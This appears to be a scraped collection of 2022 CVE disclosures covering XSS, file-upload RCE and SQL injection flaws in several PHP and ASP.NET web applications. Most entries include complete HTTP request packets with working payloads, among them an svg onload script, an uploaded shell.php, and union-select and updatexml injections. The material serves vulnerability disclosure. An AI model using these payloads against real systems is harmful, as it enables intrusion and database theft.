In Afian Filerun 20220202 Changing the "search_tika_path" variable to a custom (and previously uploaded) jar file results in remote code execution in the context of the webserver user.

CVE-2022-30470: FileRun - Selfhosted File Manager with Sharing and Backup for Photos, Docs & More

siteserver SSCMS 6.15.51 is vulnerable to Cross Site Scripting (XSS).

测试的版本:https://github.com/siteserver/cms/releases/download/siteserver-v6.15.51/siteserver\_install.zip  
SiteServer: V6.15.51  
测试环境：windows 2012 R2  
数据库 sql server 2016  
  
(需要登录测试)  
漏洞url:/SiteServer/cms/modalRelatedFieldItemEdit.aspx?siteId=1&RelatedFieldID=1&ParentID=0&Level=1&ID=1  

包体  
\`POST /SiteServer/cms/modalRelatedFieldItemEdit.aspx?siteId=1&RelatedFieldID=1&ParentID=0&Level=1&ID=1 HTTP/1.1  
Host: 192.168.39.3:8055  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 304  
Origin: http://192.168.39.3:8055  
Connection: close  
Referer: http://192.168.39.3:8055/SiteServer/cms/modalRelatedFieldItemEdit.aspx?siteId=1&RelatedFieldID=1&ParentID=0&Level=1&ID=1  
Cookie: BAIRONG.VC.ADMINLOGIN=oeLExOp9UBM0equals0; ss\_administrator\_access\_token=M3ENIa3NKJJ39JCRHnY4PgfJqMC7lFjggL0e9S06Bs9ubZE90add0xM2aesaL0add0Cxo8Xe5VZrSanerzFU8oZaMXCC9KMxdw29fLk6uNSSoY4Pa0add0BOZfzRwKT2t3LglumO4sTUKSz0slash0ubJ9QajCyTsKpmbPu7yv20add08zpsQyVPpl3TuMITkOCIX1EwcC7CeIJ50slash0XQ9d0slash0oR8ECV0add0690add0eXRHbEImnZsLBsrhv7KML0Jhuevbhvcjs0equals0; ASP.NET\_SessionId=l3tothqgmzbgljaogh1uof3y; SS-ADMIN-TOKEN=z69iWbk6QAgWtUmPiJBXDd7vXmikE7IMRbVWfh0add00xyMUHXn13zDSbfJyodBLcAQuP9kU0slash0F7SybZwZUK7ER9csWj0ODr7NgSqXfVWABfJpKMXGuT2wQudsXkhDU9JMvsrkNIPV5cKDS3vGUQNyPwFtxt7YFaPv4h0slash09w0slash0UOjfXLezfaa1ML5HzkaV5p1JCQWmJTQEnr7CYs7SWD7Jqq2Ifc0slash0oUvADaZFl2TmYxcUUCqEQ0equals00secret0  
Upgrade-Insecure-Requests: 1

\_\_EVENTTARGET=&\_\_EVENTARGUMENT=&\_\_VIEWSTATE=MVZqB4shzUeYHIX5zAuRZJJbL8r72A7Evx94mUbTTNpGbOwWBZkeb79FVsI2zTj0PlNYIzK%2BpEzx3SRf96HflbXA8nFVIpCU16GBIeWZSq4vLCZLjX0CoHWGwnxNyQzo&\_\_VIEWSTATEGENERATOR=4DCED64B&TbItemName=%3Csvg+onload%3Dalert%28document.domain%29%3E&TbItemValue=2222&ctl04=%E7%A1%AE+%E5%AE%9A\`

CVE-2022-30349: 跨站脚本攻击(xss) · Issue #3238 · siteserver/cms

Merchandise Online Store v1.0 by oretnom23 has an arbitrary code execution (RCE) vulnerability in the user profile upload point in the system information.

Permalink

Cannot retrieve contributors at this time

**Merchandise Online Store v1.0 by oretnom23 has arbitrary code execution (RCE)**

**Author** : ffYYy6x0y1

vendor: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Vulnerability url: http://ip/vloggers\_merch/admin/?page=user

Loophole location： There is an arbitrary file upload vulnerability (RCE) in the user profile upload point in the system information.

Request package for file upload：

POST /vloggers\_merch/classes/Users.php?f\=save HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/vloggers\_merch/admin/?page=user
Content-Length: 728
Content-Type: multipart/form-data; boundary=---------------------------972285327633
Cookie: PHPSESSID=ikts6n5evd3ahejiopufg6114g
Connection: close
\-----------------------------972285327633
Content-Disposition: form-data; name="id"
1
\-----------------------------972285327633
Content-Disposition: form-data; name="firstname"
Adminstrator
\-----------------------------972285327633
Content-Disposition: form-data; name="lastname"
Admin
\-----------------------------972285327633
Content-Disposition: form-data; name="username"
admin
\-----------------------------972285327633
Content-Disposition: form-data; name="password"
admin123
\-----------------------------972285327633
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------972285327633--

The files will be uploaded to this directory \\vloggers\_merch\\uploads

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-30423: bug_report/RCE-1.md at main · ffYYy6x0y1/bug_report

Simple Bus Ticket Booking System 1.0 is vulnerable to SQL Injection via /SimpleBusTicket/index.php.

**Simple Bus Ticket Booking System v1.0 by codeastr.com has SQL injection**

vendors: https://codeastro.com/simple-bus-ticket-booking-system-in-php-with-source-code/

Vulnerability File: /SimpleBusTicket/index.php

Vulnerability location: /SimpleBusTicket/index.php, phr

\[+\] Payload: pnr=111' union select 1,2,3,4,database(),6,7,8--+&pnr-search=

dbname = sbtbsphp ---> length = 8

POST /SimpleBusTicket/index.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
pnr=111' union select 1,2,3,4,database(),6,7,8--+&pnr-search=

CVE-2022-30817: bug_report/SQLi-1.md at main · k0xx11/bug_report

elitecms v1.01 is vulnerable to SQL Injection via /admin/add_sidebar.php.

**Elitecms v1.01 by elitecms has SQL injection**

vendors: https://elitecms.net/download.php

Vulnerability File: /admin/add\_sidebar.php

Vulnerability location: ip/eliteCMS1.01/admin/add\_sidebar.php?page=, page

dbname: elitecms101

\[+\] Payload: /eliteCMS1.01/admin/add\_sidebar.php?page=-1%20union%20select%201,2,3,4,database(),6,7,8,9,10,11--+&sidebar=3 // Leak place ---> page

GET /eliteCMS1.01/admin/add\_sidebar.php?page\=\-1%20union%20select%201,2,3,4,database(),6,7,8,9,10,11\--+&sidebar=3 HTTP/1.1
Host: 192.168.1.108
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=307ef75a2f3ab4c1103d8a1e90cf120e
Connection: close

CVE-2022-30814: bug_report/SQLi-5.md at main · k0xx11/bug_report

elitecms v1.01 is vulnerable to SQL Injection via admin/edit_post.php.

Permalink

**Elitecms v1.01 by elitecms has SQL injection**

vendors: https://elitecms.net/download.php

Vulnerability File: /admin/edit\_post.php

Vulnerability location: ip/eliteCMS1.01/admin/edit\_post.php?page=1&post=, post

dbname: elitecms101

\[+\] Payload: /eliteCMS1.01/admin/edit\_post.php?page=1&post=-1%20union%20select%201,2,3,4,database(),6--+ // Leak place ---> post

GET /eliteCMS1.01/admin/edit\_post.php?page\=1&post\=\-1%20union%20select%201,2,3,4,database(),6\--\+ HTTP/1.1
Host: 192.168.1.108
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=307ef75a2f3ab4c1103d8a1e90cf120e
Connection: close

CVE-2022-30810: bug_report/SQLi-2.md at main · k0xx11/bug_report

elitecms 1.01 is vulnerable to SQL Injection via /admin/add_post.php.

**Elitecms v1.01 by elitecms has SQL injection**

vendors: https://elitecms.net/download.php

Vulnerability File: /admin/add\_post.php

Vulnerability location: ip/eliteCMS1.01/admin/add\_post.php?page=, page

dbname: elitecms101

\[+\] Payload: /eliteCMS1.01/admin/add\_post.php?page=-3%20union%20select%201,2,3,4,database(),6,7,8,9,10,11--+ // Leak place ---> page

GET /eliteCMS1.01/admin/add\_post.php?page\=\-3%20union%20select%201,2,3,4,database(),6,7,8,9,10,11\--\+ HTTP/1.1
Host: 192.168.1.108
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=307ef75a2f3ab4c1103d8a1e90cf120e
Connection: close

CVE-2022-30813: bug_report/SQLi-3.md at main · k0xx11/bug_report

elitecms 1.01 is vulnerable to SQL Injection via /admin/edit_page.php?page=.

**Elitecms v1.01 by elitecms has SQL injection**

vendors: https://elitecms.net/download.php

Vulnerability File: eliteCMS1.01/admin/edit\_page.php?page=

Vulnerability location: ip/eliteCMS1.01/admin/edit\_page.php?page=, page

dbname: elitecms101

\[+\] Payload: /eliteCMS1.01/admin/edit\_page.php?page=-1%20union%20select%201,database(),3,4,5,6,7,8,9,10,11--+ // Leak place ---> page

GET /eliteCMS1.01/admin/edit\_page.php?page\=\-1%20union%20select%201,database(),3,4,5,6,7,8,9,10,11\--\+ HTTP/1.1
Host: 192.168.1.108
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=307ef75a2f3ab4c1103d8a1e90cf120e
Connection: close

CVE-2022-30809: bug_report/SQLi-1.md at main · k0xx11/bug_report

Rescue Dispatch Management System v1.0 is vulnerable to SQL Injection via /rdms/classes/Master.php?f=delete_respondent_type.

Permalink

Cannot retrieve contributors at this time

**Rescue Dispatch Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15296/rescue-dispatch-management-system-phpoop-free-source-code.html

Vulnerability File: /rdms/classes/Master.php?f=delete\_respondent\_type

Vulnerability location: /rdms/classes/Master.php?f=delete\_respondent\_type, id

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /rdms/classes/Master.php?f\=delete\_respondent\_type HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/rdms/admin/?page=respondent\_types
Content-Length: 65
Cookie: PHPSESSID=hkbchcmaitn0d8enhm4jtdjk9q
Connection: close
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-31951: bug_report/SQLi-4.md at main · k0xx11/bug_report

Rescue Dispatch Management System v1.0 is vulnerable to SQL Injection via /rdms/classes/Master.php?f=delete_report.

Permalink

Cannot retrieve contributors at this time

**Rescue Dispatch Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15296/rescue-dispatch-management-system-phpoop-free-source-code.html

Vulnerability File: /rdms/classes/Master.php?f=delete\_report

Vulnerability location: /rdms/classes/Master.php?f=delete\_report, id

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /rdms/classes/Master.php?f\=delete\_report HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/rdms/admin/?page=incident\_reports
Content-Length: 65
Cookie: PHPSESSID=hkbchcmaitn0d8enhm4jtdjk9q
Connection: close
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

Tag

#windows